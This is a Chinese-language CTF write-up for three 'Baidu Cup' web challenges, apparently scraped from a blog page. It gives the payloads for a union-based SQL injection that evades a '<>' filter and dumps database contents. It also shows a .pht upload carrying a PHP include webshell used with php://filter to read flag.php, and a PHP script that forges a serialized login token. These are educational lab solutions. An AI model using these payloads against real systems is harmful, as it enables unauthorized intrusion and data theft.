百度CTF
来源:互联网 发布:网络借贷平台排名 编辑:程序博客网 时间:2024/05/17 04:44
1.sql
提示Flag 在数据库
测试发现过滤 <>
所以:
1.查字段
or<>der by 1
or<>der by 2
or<>der by 3
or<>der by 4
4 错误 => 字段为 3
2.看回显
un<>ion se<>lect 1,2,3
回显为 2
3.查数据库名(select schema_name from information_schemata limit N,1)
un<>ion se<>lect 1,(se<>lect schema_name from information_schema.schemata limit 0,1),3 => information_schema
un<>ion se<>lect 1,(se<>lect schema_name from information_schema.schemata limit 1,1),3 =>sqli
4.查表名(select table_name from information_schema.tables where table_schema =database() limit N,1)
un<>ion se<>lect 1,(se<>lect table_name from information_schema.tables where table_schema ='sqli' limit 0,1),3 => info
5.查字段名(select column_name from information_schema.columns where table_name =表名 limit N,1)
注:这information_schema.columns =>in<>formation_schema.columns
un<>ion se<>lect 1,(se<>lect column_name from in<>formation_schema.columns where table_name='info' limit 0,1),3 => id
un<>ion se<>lect 1,(se<>lect column_name from in<>formation_schema.columns where table_name='info' limit 1,1),3 =>title
un<>ion se<>lect 1,(se<>lect column_name from in<>formation_schema.columns where table_name='info' limit 2,1),3 =>flAg_T5ZNdrm
6.查数据(select 字段名 from 表名 limit N,1)
un<>ion se<>lect 1,(se<>lect flAg_T5ZNdrm from info limit 0,1),3
2.Upload
随便上传一张图片
Content-Disposition: form-data; name="file"; filename="1.pht"
<script language="PHP">require_once("$_GET[id]");</script>
地址+/u/1.pht?id=php://filter/convert.base64-encode/resource=../flag.php
解密的 flag
3.login
查看元素发现: <!-- test1 test1 -->
登录进:member.php =>(╯‵□′)╯︵┴─┴
抓包分析:发现 => show:0
于是 :
写个php算出token
<?php
$arr = array('user'=>'ichunqiu');
$taken = base64_encode(gzcompress(serialize($arr)));
echo $taken;
?>
- 百度CTF
- 百度杯”CTF比赛(十一月场)
- 百度杯”CTF比赛(十二月场)
- CTF
- ctf
- ctf
- ctf
- CTF
- "百度杯"CTF 9月2日 WriteUp.md
- 百度杯CTF Write up集锦 WEB篇
- i春秋百度杯CTF比赛2016年12月场writeup
- 百度杯 CTF比赛二月第三场比赛(Reverse专题赛)之CrackMe-1
- i春秋 百度杯”CTF比赛(二月场) Misc&&web题解 By Assassin
- WP 4 i春秋_百度杯”CTF比赛(九月第一场)
- About CTF
- CTF训练
- CTF编码
- 一道CTF
- 把Android原生的View渲染到OpenGL Texture
- 陆金所计算年化收益率
- kali dns信息收集
- binlog,redo log,undo log区别
- poj 1006 Biorhythms(中国剩余定理)
- 百度CTF
- 使用react-native,reduce开发简洁且的上拉刷新下拉加载更多的组件
- 去掉字符串最后一个字符
- [概率DP] Codeforces 453A Little Pony and Expected Maximum
- TreeMap源码解析
- 用80/20法则迅速拓展程序员学习的广度
- 矩阵乘法(POJ 3233 Matrix Power Series )
- 新手上路,对java的肤浅理解,探讨交流
- linux下ip冲突检测